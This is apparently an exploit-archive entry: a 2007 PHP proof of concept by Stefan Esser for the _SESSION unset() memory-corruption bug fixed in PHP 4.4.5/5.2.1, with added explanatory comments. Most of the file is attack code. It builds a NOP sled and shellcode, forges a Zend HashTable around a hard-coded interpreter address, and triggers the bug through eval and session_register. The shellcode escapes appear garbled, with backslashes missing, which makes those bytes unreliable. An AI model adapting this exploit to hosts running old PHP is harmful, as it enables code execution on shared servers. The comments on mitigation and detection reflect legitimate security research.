# Title : PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit
# Published : 2007-03-25
# Author : Stefan Esser
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ //
// | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|__,_||_| __,_|___||_||_|___|__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP _SESSION unset() Vulnerability //
////////////////////////////////////////////////////////////////////////
//
// Proof of concept for the _SESSION unset() bug that the title says was
// fixed in PHP 4.4.5 / 5.2.1. It is a *local* PoC: it has to run as a
// PHP script on the affected interpreter, so the exposure is limited to
// whoever can already execute PHP on that host (shared hosting being the
// classic case). Mitigation is upgrading to the patched versions. As a
// detection heuristic, application code that unset()s $_SESSION /
// $HTTP_SESSION_VARS and then calls session_register() is highly unusual
// and worth flagging in code review or runtime auditing.
//
// This is meant as a protection against remote file inclusion.
// die() halts execution before anything else runs, so the file is inert
// if it is ever include()d from another script; the author expects a
// deliberate operator to delete this line by hand.
die("REMOVE THIS LINE");
// PHP_VERSION is a string such as "5.2.0"; indexing [0] keeps only the
// first character, i.e. the major version ("4" or "5"). It selects the
// version-specific tail of the payload string below.
$PHP_MAJOR_VERSION = PHP_VERSION;
$PHP_MAJOR_VERSION = $PHP_MAJOR_VERSION[0];
// Payload string: a str_repeat() prefix, a fixed body, and a short suffix
// chosen by major version. In this script the string is used only as the
// *variable name* handed to session_register() at the end.
$shellcode = str_repeat("x90", 256).
"x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x46".
"x32x3cxe5x83xebxfcxe2xf4x77xe9x6fxa6x15x58x3ex8f".
"x20x6axa5x6cxa7xffxbcx73x05x60x5ax8dx57x6ex5axb6".
"xcfxd3x56x83x1ex62x6dxb3xcfxd3xf1x65xf6x54xedx06".
"x8bxb2x6exb7x10x71xb5x04xf6x54xf1x65xd5x58x3exbc".
"xf6x0dxf1x65x0fx4bxc5x55x4dx60x54xcax69x41x54x8d".
"x69x50x55x8bxcfxd1x6exb6xcfxd3xf1x65".
($PHP_MAJOR_VERSION==4?"x18xb0x53":"x18xb0x83");
// Absolute address of an interpreter-internal symbol for one particular
// PHP build. Because it is hard-coded, the PoC is not portable: on any
// other build the value is simply wrong and the script is expected to
// crash rather than do anything useful.
$zend_execute_internal = 0x08345b08;
// pack(): nine machine-order 32-bit unsigned ints ("L" x9) followed by
// three unsigned bytes ("C" x3). Per the variable name this byte string
// mimics the in-memory layout of a Zend HashTable, with the address
// above placed in two of the slots. The exact field-to-member mapping is
// not shown here -- NOTE(review): check against the HashTable struct of
// the targeted PHP version before relying on any description of it.
$Hashtable = pack("LLLLLLLLLCCC", 2, 1, 0, 0, 0, $zend_execute_internal, 0, $zend_execute_internal, 0x66666666, 0, 0, 0);
// The remainder is executed via eval() as one unit instead of inline.
// The statement order is the whole point of the PoC: session_start(),
// then unset() of both session superglobal aliases, then a string
// literal $x into which $Hashtable's bytes are spliced, then
// session_register() with the payload string as the variable name.
// NOTE(review): presumably the eval'd literal is there so those bytes
// land in a fresh allocation at a controlled moment after the unset();
// confirm against the original advisory. session_register() itself was
// removed in PHP 5.4, so this code cannot run at all on modern PHP.
eval('
session_start();
unset($HTTP_SESSION_VARS);
unset($_SESSION);
$x = "'.$Hashtable.'";
session_register($shellcode);');
?>